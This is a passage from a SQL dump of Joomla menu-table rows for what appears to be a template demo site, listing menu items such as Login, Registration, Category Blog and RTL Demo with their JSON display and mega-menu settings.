00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',105,106,0,'*',0),(467,'mainmenu','Module Variations','module-variations','','features/module-variations','index.php?option=com_content&view=article&id=68','component',-2,469,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',8,9,0,'*',0),(469,'mainmenu','Explore','features','','features','index.php?option=com_content&view=article&id=70','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',3,32,0,'*',0),(471,'mainmenu','Menu Example','child-item-1','','features/2012-01-31-18-59-38/child-item-1','#','url',-2,493,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"Subtitle Available\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"1\",\"mega_subcontent\":\"0\"}',11,18,0,'*',0),(472,'mainmenu','Child Item','child-item-2','','features/2012-01-31-18-59-38/child-item-1/child-item-2','#','url',-2,471,4,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',12,13,0,'*',0),(473,'mainmenu','Icon Menu','child-item-3','','features/2012-01-31-18-59-38/child-item-1/child-item-3','#','url',-2,471,4,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"icon-random\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',14,15,0,'*',0),(490,'mainmenu','Custom Styling','custom-styling','','features/custom-styling','index.php?option=com_content&view=article&id=72','component',-2,469,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',4,5,0,'*',0),(492,'mainmenu','Module Positions','module-positions','','features/module-positions','index.php?option=com_content&view=article&id=69','component',-2,469,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',6,7,0,'*',0),(493,'mainmenu','Menu Options','2012-01-31-18-59-38','','features/2012-01-31-18-59-38','#','url',-2,469,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"2\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',10,25,0,'*',0),(497,'mainmenu','Menu Types','child-item-2','','features/2012-01-31-18-59-38/child-item-2','#','url',-2,493,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"1\",\"mega_subcontent\":\"0\"}',19,24,0,'*',0),(509,'mainmenu','Module Example','mod-example','','features/2012-01-31-18-59-38/child-item-1/mod-example','','separator',-2,471,4,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"mod\",\"mega_subcontent_mod_modules\":[\"125\"],\"mega_subcontent_pos_positions\":[\"contenttop-1\",\"feature-1\",\"roof-1\",\"roof-2\"]}',16,17,0,'*',0),(511,'mainmenu','Styles','preset-styles','','preset-styles','index.php?option=com_content&view=article&id=71','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"pos\",\"mega_subcontent_pos_positions\":[\"mega2\"]}',145,146,0,'*',0),(512,'mainmenu','Joomla Core Pages','joomla','','pages/joomla','index.php?option=com_content&view=category&layout=blog&id=19','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',36,63,0,'*',0),(516,'mainmenu','Login','login-module','','login-module','index.php?option=com_users&view=login','component',-2,1,1,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"250\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"pos\",\"mega_subcontent_mod_modules\":[\"44\"],\"mega_subcontent_pos_positions\":[\"mega3\"]}',147,148,0,'*',0),(517,'mainmenu','Content','content','','pages/joomla/content','#','url',-2,512,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"All com_content views\",\"mega_cols\":\"1\",\"mega_group\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',37,44,0,'*',0),(518,'mainmenu','Category Blog','category-blog','','pages/joomla/content/category-blog','index.php?option=com_content&view=category&layout=blog&id=19','component',-2,517,4,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',38,39,0,'*',0),(519,'mainmenu','Category List','category-list','','pages/joomla/content/category-list','index.php?option=com_content&view=category&id=77','component',-2,517,4,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',40,41,0,'*',0),(520,'mainmenu','Single Article','single-article','','pages/joomla/content/single-article','index.php?option=com_content&view=article&id=22','component',-2,517,4,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',42,43,0,'*',0),(521,'mainmenu','Contact','contact','','pages/joomla/contact','','separator',-2,512,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"All com_contact views\",\"mega_cols\":\"1\",\"mega_group\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',45,50,0,'*',0),(522,'mainmenu','Contact Category','contact-category','','pages/joomla/contact/contact-category','index.php?option=com_contact&view=category&id=16','component',-2,521,4,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_position_headings\":\"\",\"show_email_headings\":\"\",\"show_telephone_headings\":\"\",\"show_mobile_headings\":\"\",\"show_fax_headings\":\"\",\"show_suburb_headings\":\"\",\"show_state_headings\":\"\",\"show_country_headings\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"initial_sort\":\"\",\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',46,47,0,'*',0),(523,'mainmenu','Single Contact','single-contact','','pages/joomla/contact/single-contact','index.php?option=com_contact&view=contact&id=1','component',-2,521,4,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',48,49,0,'*',0),(524,'mainmenu','Other Component','other-component','','pages/joomla/other-component','','separator',-2,512,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"Remaining component views\",\"mega_cols\":\"1\",\"mega_group\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',51,62,0,'*',0),(525,'mainmenu','Web Links','web-links','','pages/joomla/other-component/web-links','index.php?option=com_weblinks&view=category&id=18','component',-2,524,4,21,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_links\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_link_description\":\"\",\"show_link_hits\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',52,53,0,'*',0),(526,'mainmenu','News Feeds','news-feeds','','pages/joomla/other-component/news-feeds','index.php?option=com_newsfeeds&view=category&id=17','component',-2,524,4,17,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_articles\":\"\",\"show_link\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"feed_display_order\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',54,55,0,'*',0),(527,'mainmenu','Login','login','','pages/joomla/other-component/login','index.php?option=com_users&view=login','component',-2,524,4,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',56,57,0,'*',0),(528,'mainmenu','Registration','registration','','pages/joomla/other-component/registration','index.php?option=com_users&view=registration','component',-2,524,4,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',58,59,0,'*',0),(529,'mainmenu','User Profile','user-profile','','pages/joomla/other-component/user-profile','index.php?option=com_users&view=profile&layout=edit','component',-2,524,4,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',60,61,0,'*',0),(545,'mainmenu','RTL Demo','2012-03-30-09-21-07','','features/2012-03-30-09-21-07','index.php?option=com_content&view=featured&Itemid=101&direction=rtl','url',-2,469,2,0,0,'0000-00-00 